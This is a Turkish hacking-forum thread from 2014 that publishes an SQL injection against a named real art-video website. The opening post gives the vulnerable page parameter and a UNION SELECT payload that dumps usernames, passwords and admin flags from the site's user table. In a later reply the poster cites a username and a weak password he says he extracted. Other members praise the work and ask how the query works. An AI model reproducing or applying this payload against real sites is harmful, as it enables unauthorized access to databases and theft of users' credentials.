Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler > Bug Researchers

Bug Researchers Yeni bulunan açıklar.



http://www.sfe.tv/ SQL Injection Vulnerability

Bug Researchers

Yeni Konu aç Konu Kapatılmıştır
 
Seçenekler
Alt 29-01-2014 19:30   #1
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
05/2013
Nereden
İstanbul
Mesajlar
Konular

Teşekkür (Etti): 968
Teşekkür (Aldı): 1746


http://www.sfe.tv/ SQL Injection Vulnerability



#########################################

~ Site : SOUVENIRS FROM EARTH | Art TV Station for Video Art, Film & Music

~ Date : 27.01.2014 // 19:29

~ Bug : maske.php?id=126

~ Exploit : UNION SELECT 1,2,3,group_concat(name,0x3a,pass,0x3a,admin),5,6, 7+from+user

~ Platform : Php

########################################

ZoRRoKiN & INFeRNaL & Se-zeR & GökTürk & ALcatraz'

TurkHackTeam.Net ~ ALcatraz'



___________________________________________

En çok ne zoruma gidiyor biliyor musun? "Ülkem" diye kaydetmiştin beni telefonuna. Kalbimi parçalara ayırdın, hani vatan bölünmezdi?

Yokluğun bilinç altımdayken , varlığın kimin altında merak ediyorum.
 Offline  
 
Teşekkür

WhooLe Teşekkür etti.
Alt 29-01-2014 22:05   #2
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
10/2012
Nereden
Kocaeli
Mesajlar
Konular

Teşekkür (Etti): 161
Teşekkür (Aldı): 73




Başarılı tebrikler ancak baştaki amca nabıyor öyle



___________________________________________

Benim Dedem:
Fatih Sultan Mehmet
Benim Dedem:
Sultan Selim Han
Benim Dedem:
Kanuni Sultan Süleyman

Benim Atam İse
Mustafa Kemal Atatürk
http://i.hizliresim.com/wL4nJz.jpg

 Offline  
 
Alt 29-01-2014 22:13   #3
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
12/2012
Nereden
malatya
Mesajlar
Konular

Teşekkür (Etti): 179
Teşekkür (Aldı): 125




Keske hacklemeseydın sende herakles gıbı bıze bıraksaydın bıde bısı soracam bunu deneyerekde yapabılırım de telefondan gırdıgım ıcın soruyorum group_concat(...) yapmışsın ya oraya group_concat degılde sadece user tablosundan bır kolonun ısmını yazssan yazdıgın kolon yansırmıydı? Saol paylastıgın ıcın
 Offline  
 
Alt 29-01-2014 22:15   #4
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
05/2013
Nereden
İstanbul
Mesajlar
Konular

Teşekkür (Etti): 968
Teşekkür (Aldı): 1746




Alıntı:
CaDaBRa´isimli üyeden Alıntı Mesajı göster
Keske hacklemeseydın sende herakles gıbı bıze bıraksaydın bıde bısı soracam bunu deneyerekde yapabılırım de telefondan gırdıgım ıcın soruyorum group_concat(...) yapmışsın ya oraya group_concat degılde sadece user tablosundan bır kolonun ısmını yazssan yazdıgın kolon yansırmıydı? Saol paylastıgın ıcın
Hacklemedim. + yansırdı ama tek tek mesela 1.username kolonun verisi prolexas pass kolonun verisi 123456 ama daha bir sürü var group_concat ile hepsini çekebilirsin.



___________________________________________

En çok ne zoruma gidiyor biliyor musun? "Ülkem" diye kaydetmiştin beni telefonuna. Kalbimi parçalara ayırdın, hani vatan bölünmezdi?

Yokluğun bilinç altımdayken , varlığın kimin altında merak ediyorum.
 Offline  
 
Alt 29-01-2014 22:19   #5
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
12/2012
Nereden
malatya
Mesajlar
Konular

Teşekkür (Etti): 179
Teşekkür (Aldı): 125




Alıntı:
ALcatraz'´isimli üyeden Alıntı Mesajı göster


Hacklemedim. + yansırdı ama tek tek mesela 1.username kolonun verisi prolexas pass kolonun verisi 123456 ama daha bir sürü var group_concat ile hepsini çekebilirsin.
Eyw. Saol tahmn ettıgm gıbı.sql ı cozecem ıns. . Hacklemedım dıon hacklemedınde bızede yapacak bısı bırakmamıssın admn panelınden baska(onu bulmakda bazen zor oluyor ) bıde sql anlatımların var orada bırsey sordum lutfen cvp ver selametle.
 Offline  
 
Konu Kapatılmıştır

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau